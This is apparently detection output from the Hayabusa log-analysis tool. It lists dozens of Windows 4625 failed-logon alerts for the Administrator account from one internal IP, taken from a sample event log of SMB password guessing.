2016-09-20 01:50:30.881 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8TyPDYm9QCAmqj7h | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.927 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1Dw3iK7DQMVXy8LW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:30.977 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BMuO0QEkxpKRv4Vl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:31.016 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RaHECaQDXCXQc9Xw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:31.060 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ewXT2VcARiaNLIxJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:31.110 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dGSTrm4AOojs7So0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:31.148 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wVTBSk0Q65LkaTqg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:31.209 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NjFN51w3T4VwuWa5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:31.248 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KG7a88h48ZEyOuYw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:31.292 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6ksKuTSGukc5em3B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:31.336 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tPEMcGV6ZR92sWNY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:31.369 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iBQ6sKrRjb7BsySN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:31.421 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gDFnG1gv7jOeIQ0t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:31.454 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QdFKkcNpkfAScnkp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:31.511 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: IAYbV4ioewwkZSmy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:31.557 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1bQ2Dxd6nlgSXJpo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:31.596 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: havLyoVCfdCqzrqO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:31.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b2vZLhz19pXrq9iE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:31.688 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: A4TSN93DrSWb1ah4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:31.718 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QwFyrxiceLRTD9rI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 
01:50:31.762 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ARbqo84Mr5T3ltRg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:31.901 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 34HpQJO17IDWber9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:31.978 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bSSbqOtdSeH58oIp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:32.009 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EMvTo7fU6J468WE9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:32.051 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8gzx6Vr9LoInM1df | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:32.096 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kwXC2S4HwdwNE6SX | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:32.136 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1pQa1WxSt3bj9LEv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:32.185 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fm65jq9tRQznmWPh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:32.237 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zd8BJbXvEoaDADLc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:32.280 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: P0JlFw7S6jFUt4Iy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:32.313 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rfMbFXQcP5sA2wmf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:32.349 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: Xu4pgyCcDjl9h0Et | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:32.396 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B00w8dZG3sT2Lsqo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:32.450 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8aKGq6qrchp4SLvT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:32.568 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XnScYHBCKOSHItsi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:32.610 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: r8UMBM326M7a4njd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:32.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kTdYWOi6p7etRfya | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 
01:50:32.691 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JWSlcEVzj5lGtVg0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:32.728 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xc77wukLTPOYAzj2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:32.769 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w4WmTwTGuwDN6YXn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:32.817 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aeN4cSffFA04oOje | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:32.849 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eYFPV1kGALqX8jyO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:32.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qIlhxT4qqo5bCsU3 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:32.928 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: btoOskH0112h7MTO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:32.972 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nWUhQJBcS7XbMJUq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:33.004 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E70qmXDDWqmWJjyU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:33.047 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oX0L8wf6nt2grLvn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:33.081 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0D8BwniiXsjfkYqE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:33.124 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: sSWYo4mphuvKHQHl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:33.164 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: im8an1mDle9f8skd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:33.200 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aOyLWd5CAAjnJt3C | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:33.240 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s7gI55uWlshCLw3y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:33.288 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: l7UogJ8bBw6Epbht | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:33.328 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qIl0QRFHXCVAHWdV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 
01:50:33.370 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OxPv9v4TxFvS9JMy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:33.417 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uHMGfCorrLXpDyeD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:33.452 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KQTKgFibIa8NWExO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:33.492 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rEnx3upH3Om0wHn7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:33.532 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KlNbW1ljPSTdgUKY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:33.582 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w2WMd3HugfjSwJPJ | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:33.628 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yEy0C6dMhysbNDrX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:33.666 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vxlayd8pnAZ3dZ2Q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:33.701 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PhKO1jyWqVEdC9w2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:33.736 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dAH2mHJ4ZK5GS2p0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:33.776 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lV2ZIWGGwlkyEMRB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:33.811 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: sum2yMFio9KLwZk5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:33.848 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fICXSRvv9Vm0uVpY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:33.894 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IgrOk6Fjp0QtfJ3i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:33.936 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OPKoHLtxNoiG65sl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:33.972 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NctXRH1DR3slfVxQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:34.012 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vLnAs36K1mTivu2w | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 
01:50:34.056 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H7crZQ0eQ5RDNIp7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:34.108 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yHjgGhEtZgNwjaii | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:34.148 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y5gi2SS2mQiDylQ8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:34.186 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kqWJGguiWBEplJiZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 